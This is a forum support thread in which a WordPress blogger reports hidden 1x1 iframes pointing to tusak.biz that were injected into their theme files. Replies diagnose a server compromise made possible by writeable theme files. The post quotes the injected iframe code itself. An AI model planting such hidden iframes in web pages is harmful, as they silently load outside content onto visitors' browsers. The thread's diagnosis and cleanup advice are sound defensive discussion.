Mysterious iFrame… tusak.biz ?

  • Resolved cnymike

    (@cnymike)


    18 years, 1 month ago

    I was editing my blog just now and saw that the browser was trying to connect to tusak.biz

    I looked in the source code and discovered an iFrame

    <h3 id="respond">Leave a Reply</h3>
    <form action="https://myblog/blog/wp-comments-post.php" method="post" id="commentform">
    Logged in as <a href="https://myblog/blog/wp-admin/profile.php">Admin</a>. <a href="https://myblog/blog/wp-login.php?action=logout" title="Log out of this account">Logout &raquo;</a>
    <small><strong>XHTML:</strong> You can use these tags: <a href=&quot;&quot; title=&quot;&quot;> <abbr title=&quot;&quot;> <acronym title=&quot;&quot;> <b> <blockquote cite=&quot;&quot;> <code> <em> <i> <strike> <strong> </small>
    <textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea>
    <input name="submit" type="submit" id="submit" tabindex="5" value="Submit Comment" />
    <input type="hidden" name="comment_post_ID" value="110" />
    </form>
    <iframe width="1" height="1" src="https://tusak.biz/kav/index2.php" style="border: 0;"></iframe>
    <iframe width="1" height="1" src="https://tusak.biz/kav/index2.php" style="border: 0;"></iframe>
    </div>
    <!-- begin footer -->

    What the heck is that? Have I been hacked? This iFrame appeared in every blog entry on the page.

Viewing 3 replies - 1 through 3 (of 3 total)

  • Looks like you’re the victim of a hack. Look for that code in your index.php files, and ask your host how this happened.

    Thread Starter cnymike

    (@cnymike)

    I found that iFrame code in several other of my WP Themes…themes that are in the installation, but not actually being used. The code always appears at the very end of whatever theme file I look at. All the files in the theme, with the exception of the stylesheet (css) files have the iFrame code in them.

    Did this happen because I made the theme directory writeable so I could modify my themes? But even if that is the case, how would someone hack into my site? I’m really confused about this.

    The files being writeable would make them vulnerable, yes. But you need to talk to your host – they need to know (if they don’t already) that someone has compromised their server.

    Their logs should give some idea of how the attack was done.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Mysterious iFrame… tusak.biz ?’ is closed to new replies.